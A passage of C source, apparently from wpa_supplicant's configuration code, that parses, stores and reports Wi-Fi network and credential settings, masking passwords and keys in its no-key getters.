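 *	wpa_config_set(ssid, "psk", "\"example passphrase\"", 0);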
*/ int wpa_config_set(struct wpa_ssid *ssid, const char *var, const char *value, int line) { size_t i; int ret = 0; if (ssid == NULL || var == NULL || value == NULL) return -1; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) != 0) continue; if (field->parser(field, ssid, line, value)) { if (line) { wpa_printf(MSG_ERROR, "Line %d: failed to " "parse %s '%s'.", line, var, value); } ret = -1; } break; } if (i == NUM_SSID_FIELDS) { if (line) { wpa_printf(MSG_ERROR, "Line %d: unknown network field " "'%s'.", line, var); } ret = -1; } return ret; } int wpa_config_set_quoted(struct wpa_ssid *ssid, const char *var, const char *value) { size_t len; char *buf; int ret; len = os_strlen(value); buf = os_malloc(len + 3); if (buf == NULL) return -1; buf[0] = '"'; os_memcpy(buf + 1, value, len); buf[len + 1] = '"'; buf[len + 2] = '\0'; ret = wpa_config_set(ssid, var, buf, 0); os_free(buf); return ret; } /** * wpa_config_get_all - Get all options from network configuration * @ssid: Pointer to network configuration data * @get_keys: Determines if keys/passwords will be included in returned list * (if they may be exported) * Returns: %NULL terminated list of all set keys and their values in the form * of [key1, val1, key2, val2, ... , NULL] * * This function can be used to get list of all configured network properties. * The caller is responsible for freeing the returned list and all its * elements. */ char ** wpa_config_get_all(struct wpa_ssid *ssid, int get_keys) { const struct parse_data *field; char *key, *value; size_t i; char **props; int fields_num; get_keys = get_keys && ssid->export_keys; props = os_calloc(2 * NUM_SSID_FIELDS + 1, sizeof(char *)); if (!props) return NULL; fields_num = 0; for (i = 0; i < NUM_SSID_FIELDS; i++) { field = &ssid_fields[i]; if (field->key_data && !get_keys) continue; value = field->writer(field, ssid); if (value == NULL) continue; if (os_strlen(value) == 0) { os_free(value); continue; } key = os_strdup(field->name); if (key == NULL) { os_free(value); goto err; } props[fields_num * 2] = key; props[fields_num * 2 + 1] = value; fields_num++; } return props; err: value = *props; while (value) os_free(value++); os_free(props); return NULL; } #ifndef NO_CONFIG_WRITE /** * wpa_config_get - Get a variable in network configuration * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * Returns: Value of the variable or %NULL on failure * * This function can be used to get network configuration variables. The * returned value is a copy of the configuration variable in text format, i.e,. * the same format that the text-based configuration file and wpa_config_set() * are using for the value. The caller is responsible for freeing the returned * value. */ char * wpa_config_get(struct wpa_ssid *ssid, const char *var) { size_t i; if (ssid == NULL || var == NULL) return NULL; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) == 0) return field->writer(field, ssid); } return NULL; } /** * wpa_config_get_no_key - Get a variable in network configuration (no keys) * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * Returns: Value of the variable or %NULL on failure * * This function can be used to get network configuration variable like * wpa_config_get(). The only difference is that this functions does not expose * key/password material from the configuration. 
In case a key/password field * is requested, the returned value is %NULL if the variable * is not set and "*" if the variable is set (regardless of its value). The * returned value is a copy of the configuration variable in text format, i.e., * the same format that the text-based configuration file and wpa_config_set() * are using for the value. The caller is responsible for freeing the returned * value. */ char * wpa_config_get_no_key(struct wpa_ssid *ssid, const char *var) { size_t i; if (ssid == NULL || var == NULL) return NULL; for (i = 0; i < NUM_SSID_FIELDS; i++) { const struct parse_data *field = &ssid_fields[i]; if (os_strcmp(var, field->name) == 0) { char *res = field->writer(field, ssid); if (field->key_data) { if (res && res[0]) { wpa_printf(MSG_DEBUG, "Do not allow " "key_data field to be " "exposed"); str_clear_free(res); return os_strdup("*"); } os_free(res); return NULL; } return res; } } return NULL; } #endif /* NO_CONFIG_WRITE */ /** * wpa_config_update_psk - Update WPA PSK based on passphrase and SSID * @ssid: Pointer to network configuration data * * This function must be called to update WPA PSK when either SSID or the * passphrase has changed for the network configuration. */ void wpa_config_update_psk(struct wpa_ssid *ssid) { #ifndef CONFIG_NO_PBKDF2 pbkdf2_sha1(ssid->passphrase, ssid->ssid, ssid->ssid_len, 4096, ssid->psk, PMK_LEN); wpa_hexdump_key(MSG_MSGDUMP, "PSK (from passphrase)", ssid->psk, PMK_LEN); ssid->psk_set = 1; #endif /* CONFIG_NO_PBKDF2 */ } static int wpa_config_set_cred_req_conn_capab(struct wpa_cred *cred, const char *value) { u8 *proto; int **port; int *ports, *nports; const char *pos; unsigned int num_ports; proto = os_realloc_array(cred->req_conn_capab_proto, cred->num_req_conn_capab + 1, sizeof(u8)); if (proto == NULL) return -1; cred->req_conn_capab_proto = proto; port = os_realloc_array(cred->req_conn_capab_port, cred->num_req_conn_capab + 1, sizeof(int *)); if (port == NULL) return -1; cred->req_conn_capab_port = port; proto[cred->num_req_conn_capab] = atoi(value); pos = os_strchr(value, ':'); if (pos == NULL) { port[cred->num_req_conn_capab] = NULL; cred->num_req_conn_capab++; return 0; } pos++; ports = NULL; num_ports = 0; while (*pos) { nports = os_realloc_array(ports, num_ports + 1, sizeof(int)); if (nports == NULL) { os_free(ports); return -1; } ports = nports; ports[num_ports++] = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) break; pos++; } nports = os_realloc_array(ports, num_ports + 1, sizeof(int)); if (nports == NULL) { os_free(ports); return -1; } ports = nports; ports[num_ports] = -1; port[cred->num_req_conn_capab] = ports; cred->num_req_conn_capab++; return 0; } int wpa_config_set_cred(struct wpa_cred *cred, const char *var, const char *value, int line) { char *val; size_t len; if (os_strcmp(var, "temporary") == 0) { cred->temporary = atoi(value); return 0; } if (os_strcmp(var, "priority") == 0) { cred->priority = atoi(value); return 0; } if (os_strcmp(var, "sp_priority") == 0) { int prio = atoi(value); if (prio < 0 || prio > 255) return -1; cred->sp_priority = prio; return 0; } if (os_strcmp(var, "pcsc") == 0) { cred->pcsc = atoi(value); return 0; } if (os_strcmp(var, "eap") == 0) { struct eap_method_type method; method.method = eap_peer_get_type(value, &method.vendor); if (method.vendor == EAP_VENDOR_IETF && method.method == EAP_TYPE_NONE) { wpa_printf(MSG_ERROR, "Line %d: unknown EAP type '%s' " "for a credential", line, value); return -1; } os_free(cred->eap_method); cred->eap_method =
os_malloc(sizeof(*cred->eap_method)); if (cred->eap_method == NULL) return -1; os_memcpy(cred->eap_method, &method, sizeof(method)); return 0; } if (os_strcmp(var, "password") == 0 && os_strncmp(value, "ext:", 4) == 0) { str_clear_free(cred->password); cred->password = os_strdup(value); cred->ext_password = 1; return 0; } if (os_strcmp(var, "update_identifier") == 0) { cred->update_identifier = atoi(value); return 0; } if (os_strcmp(var, "min_dl_bandwidth_home") == 0) { cred->min_dl_bandwidth_home = atoi(value); return 0; } if (os_strcmp(var, "min_ul_bandwidth_home") == 0) { cred->min_ul_bandwidth_home = atoi(value); return 0; } if (os_strcmp(var, "min_dl_bandwidth_roaming") == 0) { cred->min_dl_bandwidth_roaming = atoi(value); return 0; } if (os_strcmp(var, "min_ul_bandwidth_roaming") == 0) { cred->min_ul_bandwidth_roaming = atoi(value); return 0; } if (os_strcmp(var, "max_bss_load") == 0) { cred->max_bss_load = atoi(value); return 0; } if (os_strcmp(var, "req_conn_capab") == 0) return wpa_config_set_cred_req_conn_capab(cred, value); if (os_strcmp(var, "ocsp") == 0) { cred->ocsp = atoi(value); return 0; } if (os_strcmp(var, "sim_num") == 0) { cred->sim_num = atoi(value); return 0; } val = wpa_config_parse_string(value, &len); if (val == NULL) { wpa_printf(MSG_ERROR, "Line %d: invalid field '%s' string " "value '%s'.", line, var, value); return -1; } if (os_strcmp(var, "realm") == 0) { os_free(cred->realm); cred->realm = val; return 0; } if (os_strcmp(var, "username") == 0) { str_clear_free(cred->username); cred->username = val; return 0; } if (os_strcmp(var, "password") == 0) { str_clear_free(cred->password); cred->password = val; cred->ext_password = 0; return 0; } if (os_strcmp(var, "ca_cert") == 0) { os_free(cred->ca_cert); cred->ca_cert = val; return 0; } if (os_strcmp(var, "client_cert") == 0) { os_free(cred->client_cert); cred->client_cert = val; return 0; } if (os_strcmp(var, "private_key") == 0) { os_free(cred->private_key); cred->private_key = val; return 0; } if (os_strcmp(var, "private_key_passwd") == 0) { str_clear_free(cred->private_key_passwd); cred->private_key_passwd = val; return 0; } if (os_strcmp(var, "imsi") == 0) { os_free(cred->imsi); cred->imsi = val; return 0; } if (os_strcmp(var, "milenage") == 0) { str_clear_free(cred->milenage); cred->milenage = val; return 0; } if (os_strcmp(var, "domain_suffix_match") == 0) { os_free(cred->domain_suffix_match); cred->domain_suffix_match = val; return 0; } if (os_strcmp(var, "domain") == 0) { char **new_domain; new_domain = os_realloc_array(cred->domain, cred->num_domain + 1, sizeof(char *)); if (new_domain == NULL) { os_free(val); return -1; } new_domain[cred->num_domain++] = val; cred->domain = new_domain; return 0; } if (os_strcmp(var, "phase1") == 0) { os_free(cred->phase1); cred->phase1 = val; return 0; } if (os_strcmp(var, "phase2") == 0) { os_free(cred->phase2); cred->phase2 = val; return 0; } if (os_strcmp(var, "roaming_consortium") == 0) { if (len < 3 || len > sizeof(cred->roaming_consortium)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "roaming_consortium length %d (3..15 " "expected)", line, (int) len); os_free(val); return -1; } os_memcpy(cred->roaming_consortium, val, len); cred->roaming_consortium_len = len; os_free(val); return 0; } if (os_strcmp(var, "required_roaming_consortium") == 0) { if (len < 3 || len > sizeof(cred->required_roaming_consortium)) { wpa_printf(MSG_ERROR, "Line %d: invalid " "required_roaming_consortium length %d " "(3..15 expected)", line, (int) len); os_free(val); return -1; } 
os_memcpy(cred->required_roaming_consortium, val, len); cred->required_roaming_consortium_len = len; os_free(val); return 0; } if (os_strcmp(var, "excluded_ssid") == 0) { struct excluded_ssid *e; if (len > MAX_SSID_LEN) { wpa_printf(MSG_ERROR, "Line %d: invalid " "excluded_ssid length %d", line, (int) len); os_free(val); return -1; } e = os_realloc_array(cred->excluded_ssid, cred->num_excluded_ssid + 1, sizeof(struct excluded_ssid)); if (e == NULL) { os_free(val); return -1; } cred->excluded_ssid = e; e = &cred->excluded_ssid[cred->num_excluded_ssid++]; os_memcpy(e->ssid, val, len); e->ssid_len = len; os_free(val); return 0; } if (os_strcmp(var, "roaming_partner") == 0) { struct roaming_partner *p; char *pos; p = os_realloc_array(cred->roaming_partner, cred->num_roaming_partner + 1, sizeof(struct roaming_partner)); if (p == NULL) { os_free(val); return -1; } cred->roaming_partner = p; p = &cred->roaming_partner[cred->num_roaming_partner]; pos = os_strchr(val, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; if (pos - val - 1 >= (int) sizeof(p->fqdn)) { os_free(val); return -1; } os_memcpy(p->fqdn, val, pos - val); p->exact_match = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; p->priority = atoi(pos); pos = os_strchr(pos, ','); if (pos == NULL) { os_free(val); return -1; } *pos++ = '\0'; if (os_strlen(pos) >= sizeof(p->country)) { os_free(val); return -1; } os_memcpy(p->country, pos, os_strlen(pos) + 1); cred->num_roaming_partner++; os_free(val); return 0; } if (os_strcmp(var, "provisioning_sp") == 0) { os_free(cred->provisioning_sp); cred->provisioning_sp = val; return 0; } if (line) { wpa_printf(MSG_ERROR, "Line %d: unknown cred field '%s'.", line, var); } os_free(val); return -1; } static char * alloc_int_str(int val) { char *buf; buf = os_malloc(20); if (buf == NULL) return NULL; os_snprintf(buf, 20, "%d", val); return buf; } static char * alloc_strdup(const char *str) { if (str == NULL) return NULL; return os_strdup(str); } char * wpa_config_get_cred_no_key(struct wpa_cred *cred, const char *var) { if (os_strcmp(var, "temporary") == 0) return alloc_int_str(cred->temporary); if (os_strcmp(var, "priority") == 0) return alloc_int_str(cred->priority); if (os_strcmp(var, "sp_priority") == 0) return alloc_int_str(cred->sp_priority); if (os_strcmp(var, "pcsc") == 0) return alloc_int_str(cred->pcsc); if (os_strcmp(var, "eap") == 0) { if (!cred->eap_method) return NULL; return alloc_strdup(eap_get_name(cred->eap_method[0].vendor, cred->eap_method[0].method)); } if (os_strcmp(var, "update_identifier") == 0) return alloc_int_str(cred->update_identifier); if (os_strcmp(var, "min_dl_bandwidth_home") == 0) return alloc_int_str(cred->min_dl_bandwidth_home); if (os_strcmp(var, "min_ul_bandwidth_home") == 0) return alloc_int_str(cred->min_ul_bandwidth_home); if (os_strcmp(var, "min_dl_bandwidth_roaming") == 0) return alloc_int_str(cred->min_dl_bandwidth_roaming); if (os_strcmp(var, "min_ul_bandwidth_roaming") == 0) return alloc_int_str(cred->min_ul_bandwidth_roaming); if (os_strcmp(var, "max_bss_load") == 0) return alloc_int_str(cred->max_bss_load); if (os_strcmp(var, "req_conn_capab") == 0) { unsigned int i; char *buf, *end, *pos; int ret; if (!cred->num_req_conn_capab) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_req_conn_capab; i++) { int *ports; ret = os_snprintf(pos, end - pos, "%s%u", i > 0 ? 
"\n" : "", cred->req_conn_capab_proto[i]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; ports = cred->req_conn_capab_port[i]; if (ports) { int j; for (j = 0; ports[j] != -1; j++) { ret = os_snprintf(pos, end - pos, "%s%d", j > 0 ? "," : ":", ports[j]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } } } return buf; } if (os_strcmp(var, "ocsp") == 0) return alloc_int_str(cred->ocsp); if (os_strcmp(var, "realm") == 0) return alloc_strdup(cred->realm); if (os_strcmp(var, "username") == 0) return alloc_strdup(cred->username); if (os_strcmp(var, "password") == 0) { if (!cred->password) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "ca_cert") == 0) return alloc_strdup(cred->ca_cert); if (os_strcmp(var, "client_cert") == 0) return alloc_strdup(cred->client_cert); if (os_strcmp(var, "private_key") == 0) return alloc_strdup(cred->private_key); if (os_strcmp(var, "private_key_passwd") == 0) { if (!cred->private_key_passwd) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "imsi") == 0) return alloc_strdup(cred->imsi); if (os_strcmp(var, "milenage") == 0) { if (!(cred->milenage)) return NULL; return alloc_strdup("*"); } if (os_strcmp(var, "domain_suffix_match") == 0) return alloc_strdup(cred->domain_suffix_match); if (os_strcmp(var, "domain") == 0) { unsigned int i; char *buf, *end, *pos; int ret; if (!cred->num_domain) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_domain; i++) { ret = os_snprintf(pos, end - pos, "%s%s", i > 0 ? "\n" : "", cred->domain[i]); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "phase1") == 0) return alloc_strdup(cred->phase1); if (os_strcmp(var, "phase2") == 0) return alloc_strdup(cred->phase2); if (os_strcmp(var, "roaming_consortium") == 0) { size_t buflen; char *buf; if (!cred->roaming_consortium_len) return NULL; buflen = cred->roaming_consortium_len * 2 + 1; buf = os_malloc(buflen); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, buflen, cred->roaming_consortium, cred->roaming_consortium_len); return buf; } if (os_strcmp(var, "required_roaming_consortium") == 0) { size_t buflen; char *buf; if (!cred->required_roaming_consortium_len) return NULL; buflen = cred->required_roaming_consortium_len * 2 + 1; buf = os_malloc(buflen); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, buflen, cred->required_roaming_consortium, cred->required_roaming_consortium_len); return buf; } if (os_strcmp(var, "excluded_ssid") == 0) { unsigned int i; char *buf, *end, *pos; if (!cred->num_excluded_ssid) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_excluded_ssid; i++) { struct excluded_ssid *e; int ret; e = &cred->excluded_ssid[i]; ret = os_snprintf(pos, end - pos, "%s%s", i > 0 ? "\n" : "", wpa_ssid_txt(e->ssid, e->ssid_len)); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "roaming_partner") == 0) { unsigned int i; char *buf, *end, *pos; if (!cred->num_roaming_partner) return NULL; buf = os_malloc(4000); if (buf == NULL) return NULL; pos = buf; end = pos + 4000; for (i = 0; i < cred->num_roaming_partner; i++) { struct roaming_partner *p; int ret; p = &cred->roaming_partner[i]; ret = os_snprintf(pos, end - pos, "%s%s,%d,%u,%s", i > 0 ? 
"\n" : "", p->fqdn, p->exact_match, p->priority, p->country); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } return buf; } if (os_strcmp(var, "provisioning_sp") == 0) return alloc_strdup(cred->provisioning_sp); return NULL; } struct wpa_cred * wpa_config_get_cred(struct wpa_config *config, int id) { struct wpa_cred *cred; cred = config->cred; while (cred) { if (id == cred->id) break; cred = cred->next; } return cred; } struct wpa_cred * wpa_config_add_cred(struct wpa_config *config) { int id; struct wpa_cred *cred, *last = NULL; id = -1; cred = config->cred; while (cred) { if (cred->id > id) id = cred->id; last = cred; cred = cred->next; } id++; cred = os_zalloc(sizeof(*cred)); if (cred == NULL) return NULL; cred->id = id; cred->sim_num = DEFAULT_USER_SELECTED_SIM; if (last) last->next = cred; else config->cred = cred; return cred; } int wpa_config_remove_cred(struct wpa_config *config, int id) { struct wpa_cred *cred, *prev = NULL; cred = config->cred; while (cred) { if (id == cred->id) break; prev = cred; cred = cred->next; } if (cred == NULL) return -1; if (prev) prev->next = cred->next; else config->cred = cred->next; wpa_config_free_cred(cred); return 0; } #ifndef CONFIG_NO_CONFIG_BLOBS /** * wpa_config_get_blob - Get a named configuration blob * @config: Configuration data from wpa_config_read() * @name: Name of the blob * Returns: Pointer to blob data or %NULL if not found */ const struct wpa_config_blob * wpa_config_get_blob(struct wpa_config *config, const char *name) { struct wpa_config_blob *blob = config->blobs; while (blob) { if (os_strcmp(blob->name, name) == 0) return blob; blob = blob->next; } return NULL; } /** * wpa_config_set_blob - Set or add a named configuration blob * @config: Configuration data from wpa_config_read() * @blob: New value for the blob * * Adds a new configuration blob or replaces the current value of an existing * blob. 
*/ void wpa_config_set_blob(struct wpa_config *config, struct wpa_config_blob *blob) { wpa_config_remove_blob(config, blob->name); blob->next = config->blobs; config->blobs = blob; } /** * wpa_config_free_blob - Free blob data * @blob: Pointer to blob to be freed */ void wpa_config_free_blob(struct wpa_config_blob *blob) { if (blob) { os_free(blob->name); bin_clear_free(blob->data, blob->len); os_free(blob); } } /** * wpa_config_remove_blob - Remove a named configuration blob * @config: Configuration data from wpa_config_read() * @name: Name of the blob to remove * Returns: 0 if blob was removed or -1 if blob was not found */ int wpa_config_remove_blob(struct wpa_config *config, const char *name) { struct wpa_config_blob *pos = config->blobs, *prev = NULL; while (pos) { if (os_strcmp(pos->name, name) == 0) { if (prev) prev->next = pos->next; else config->blobs = pos->next; wpa_config_free_blob(pos); return 0; } prev = pos; pos = pos->next; } return -1; } #endif /* CONFIG_NO_CONFIG_BLOBS */ /** * wpa_config_alloc_empty - Allocate an empty configuration * @ctrl_interface: Control interface parameters, e.g., path to UNIX domain * socket * @driver_param: Driver parameters * Returns: Pointer to allocated configuration data or %NULL on failure */ struct wpa_config * wpa_config_alloc_empty(const char *ctrl_interface, const char *driver_param) { struct wpa_config *config; const int aCWmin = 4, aCWmax = 10; const struct hostapd_wmm_ac_params ac_bk = { aCWmin, aCWmax, 7, 0, 0 }; /* background traffic */ const struct hostapd_wmm_ac_params ac_be = { aCWmin, aCWmax, 3, 0, 0 }; /* best effort traffic */ const struct hostapd_wmm_ac_params ac_vi = /* video traffic */ { aCWmin - 1, aCWmin, 2, 3000 / 32, 0 }; const struct hostapd_wmm_ac_params ac_vo = /* voice traffic */ { aCWmin - 2, aCWmin - 1, 2, 1500 / 32, 0 }; config = os_zalloc(sizeof(*config)); if (config == NULL) return NULL; config->eapol_version = DEFAULT_EAPOL_VERSION; config->ap_scan = DEFAULT_AP_SCAN; config->fast_reauth = DEFAULT_FAST_REAUTH; config->p2p_go_intent = DEFAULT_P2P_GO_INTENT; config->p2p_intra_bss = DEFAULT_P2P_INTRA_BSS; config->p2p_go_max_inactivity = DEFAULT_P2P_GO_MAX_INACTIVITY; config->p2p_optimize_listen_chan = DEFAULT_P2P_OPTIMIZE_LISTEN_CHAN; config->bss_max_count = DEFAULT_BSS_MAX_COUNT; config->bss_expiration_age = DEFAULT_BSS_EXPIRATION_AGE; config->bss_expiration_scan_count = DEFAULT_BSS_EXPIRATION_SCAN_COUNT; config->max_num_sta = DEFAULT_MAX_NUM_STA; config->access_network_type = DEFAULT_ACCESS_NETWORK_TYPE; config->scan_cur_freq = DEFAULT_SCAN_CUR_FREQ; config->wmm_ac_params[0] = ac_be; config->wmm_ac_params[1] = ac_bk; config->wmm_ac_params[2] = ac_vi; config->wmm_ac_params[3] = ac_vo; config->p2p_search_delay = DEFAULT_P2P_SEARCH_DELAY; config->rand_addr_lifetime = DEFAULT_RAND_ADDR_LIFETIME; if (ctrl_interface) config->ctrl_interface = os_strdup(ctrl_interface); if (driver_param) config->driver_param = os_strdup(driver_param); return config; } #ifndef CONFIG_NO_STDOUT_DEBUG /** * wpa_config_debug_dump_networks - Debug dump of configured networks * @config: Configuration data from wpa_config_read() */ void wpa_config_debug_dump_networks(struct wpa_config *config) { int prio; struct wpa_ssid *ssid; for (prio = 0; prio < config->num_prio; prio++) { ssid = config->pssid[prio]; wpa_printf(MSG_DEBUG, "Priority group %d", ssid->priority); while (ssid) { wpa_printf(MSG_DEBUG, " id=%d ssid='%s'", ssid->id, wpa_ssid_txt(ssid->ssid, ssid->ssid_len)); ssid = ssid->pnext; } } } #endif /* CONFIG_NO_STDOUT_DEBUG */ struct 
global_parse_data { char *name; int (*parser)(const struct global_parse_data *data, struct wpa_config *config, int line, const char *value); void *param1, *param2, *param3; unsigned int changed_flag; }; static int wpa_global_config_parse_int(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int val, *dst; char *end; dst = (int *) (((u8 *) config) + (long) data->param1); val = strtol(pos, &end, 0); if (*end) { wpa_printf(MSG_ERROR, "Line %d: invalid number \"%s\"", line, pos); return -1; } *dst = val; wpa_printf(MSG_DEBUG, "%s=%d", data->name, *dst); if (data->param2 && *dst < (long) data->param2) { wpa_printf(MSG_ERROR, "Line %d: too small %s (value=%d " "min_value=%ld)", line, data->name, *dst, (long) data->param2); *dst = (long) data->param2; return -1; } if (data->param3 && *dst > (long) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too large %s (value=%d " "max_value=%ld)", line, data->name, *dst, (long) data->param3); *dst = (long) data->param3; return -1; } return 0; } static int wpa_global_config_parse_str(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; char **dst, *tmp; len = os_strlen(pos); if (data->param2 && len < (size_t) data->param2) { wpa_printf(MSG_ERROR, "Line %d: too short %s (len=%lu " "min_len=%ld)", line, data->name, (unsigned long) len, (long) data->param2); return -1; } if (data->param3 && len > (size_t) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too long %s (len=%lu " "max_len=%ld)", line, data->name, (unsigned long) len, (long) data->param3); return -1; } tmp = os_strdup(pos); if (tmp == NULL) return -1; dst = (char **) (((u8 *) config) + (long) data->param1); os_free(*dst); *dst = tmp; wpa_printf(MSG_DEBUG, "%s='%s'", data->name, *dst); return 0; } static int wpa_config_process_bgscan(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; char *tmp; int res; tmp = wpa_config_parse_string(pos, &len); if (tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse %s", line, data->name); return -1; } res = wpa_global_config_parse_str(data, config, line, tmp); os_free(tmp); return res; } static int wpa_global_config_parse_bin(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { size_t len; struct wpabuf **dst, *tmp; len = os_strlen(pos); if (len & 0x01) return -1; tmp = wpabuf_alloc(len / 2); if (tmp == NULL) return -1; if (hexstr2bin(pos, wpabuf_put(tmp, len / 2), len / 2)) { wpabuf_free(tmp); return -1; } dst = (struct wpabuf **) (((u8 *) config) + (long) data->param1); wpabuf_free(*dst); *dst = tmp; wpa_printf(MSG_DEBUG, "%s", data->name); return 0; } static int wpa_config_process_freq_list(const struct global_parse_data *data, struct wpa_config *config, int line, const char *value) { int *freqs; freqs = wpa_config_parse_int_array(value); if (freqs == NULL) return -1; if (freqs[0] == 0) { os_free(freqs); freqs = NULL; } os_free(config->freq_list); config->freq_list = freqs; return 0; } #ifdef CONFIG_P2P static int wpa_global_config_parse_ipv4(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { u32 *dst; struct hostapd_ip_addr addr; if (hostapd_parse_ip_addr(pos, &addr) < 0) return -1; if (addr.af != AF_INET) return -1; dst = (u32 *) (((u8 *) config) + (long) data->param1); os_memcpy(dst, &addr.u.v4.s_addr, 4); wpa_printf(MSG_DEBUG, "%s = 0x%x", data->name, WPA_GET_BE32((u8 *) dst)); return 0; } #endif /* CONFIG_P2P */ 
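/*
 * Illustrative sketch (an addition, not upstream hostap code): the
 * wpa_global_config_parse_*() helpers above never name the struct member
 * they write to; data->param1 carries the member's byte offset inside
 * struct wpa_config (see the OFFSET() macro further below), and each
 * parser rebuilds the destination pointer from the base address plus that
 * offset. The same technique in miniature, with a hypothetical
 * example_config struct (assumes <stddef.h> offsetof() is available):
 */
struct example_config {
	int ap_scan;
	int fast_reauth;
};

struct example_field {
	const char *name;
	size_t offset; /* byte offset of the member within example_config */
};

static const struct example_field example_fields[] = {
	{ "ap_scan", offsetof(struct example_config, ap_scan) },
	{ "fast_reauth", offsetof(struct example_config, fast_reauth) },
};

static int example_set_option(struct example_config *config,
			      const char *name, const char *value)
{
	size_t i;

	for (i = 0; i < ARRAY_SIZE(example_fields); i++) {
		if (os_strcmp(name, example_fields[i].name) != 0)
			continue;
		/* Rebuild the member address: base pointer plus offset */
		*(int *) (((u8 *) config) + example_fields[i].offset) =
			atoi(value);
		return 0;
	}
	return -1; /* unknown option */
}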
static int wpa_config_process_country(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (!pos[0] || !pos[1]) { wpa_printf(MSG_DEBUG, "Invalid country set"); return -1; } config->country[0] = pos[0]; config->country[1] = pos[1]; wpa_printf(MSG_DEBUG, "country='%c%c'", config->country[0], config->country[1]); return 0; } static int wpa_config_process_load_dynamic_eap( const struct global_parse_data *data, struct wpa_config *config, int line, const char *so) { int ret; wpa_printf(MSG_DEBUG, "load_dynamic_eap=%s", so); ret = eap_peer_method_load(so); if (ret == -2) { wpa_printf(MSG_DEBUG, "This EAP type was already loaded - not " "reloading."); } else if (ret) { wpa_printf(MSG_ERROR, "Line %d: Failed to load dynamic EAP " "method '%s'.", line, so); return -1; } return 0; } #ifdef CONFIG_WPS static int wpa_config_process_uuid(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { char buf[40]; if (uuid_str2bin(pos, config->uuid)) { wpa_printf(MSG_ERROR, "Line %d: invalid UUID", line); return -1; } uuid_bin2str(config->uuid, buf, sizeof(buf)); wpa_printf(MSG_DEBUG, "uuid=%s", buf); return 0; } static int wpa_config_process_device_type( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { return wps_dev_type_str2bin(pos, config->device_type); } static int wpa_config_process_os_version(const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { if (hexstr2bin(pos, config->os_version, 4)) { wpa_printf(MSG_ERROR, "Line %d: invalid os_version", line); return -1; } wpa_printf(MSG_DEBUG, "os_version=%08x", WPA_GET_BE32(config->os_version)); return 0; } static int wpa_config_process_wps_vendor_ext_m1( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct wpabuf *tmp; int len = os_strlen(pos) / 2; u8 *p; if (!len) { wpa_printf(MSG_ERROR, "Line %d: " "invalid wps_vendor_ext_m1", line); return -1; } tmp = wpabuf_alloc(len); if (tmp) { p = wpabuf_put(tmp, len); if (hexstr2bin(pos, p, len)) { wpa_printf(MSG_ERROR, "Line %d: " "invalid wps_vendor_ext_m1", line); wpabuf_free(tmp); return -1; } wpabuf_free(config->wps_vendor_ext_m1); config->wps_vendor_ext_m1 = tmp; } else { wpa_printf(MSG_ERROR, "Can not allocate " "memory for wps_vendor_ext_m1"); return -1; } return 0; } #endif /* CONFIG_WPS */ #ifdef CONFIG_P2P static int wpa_config_process_sec_device_type( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { int idx; if (config->num_sec_device_types >= MAX_SEC_DEVICE_TYPES) { wpa_printf(MSG_ERROR, "Line %d: too many sec_device_type " "items", line); return -1; } idx = config->num_sec_device_types; if (wps_dev_type_str2bin(pos, config->sec_device_type[idx])) return -1; config->num_sec_device_types++; return 0; } static int wpa_config_process_p2p_pref_chan( const struct global_parse_data *data, struct wpa_config *config, int line, const char *pos) { struct p2p_channel *pref = NULL, *n; unsigned int num = 0; const char *pos2; u8 op_class, chan; /* format: class:chan,class:chan,... 
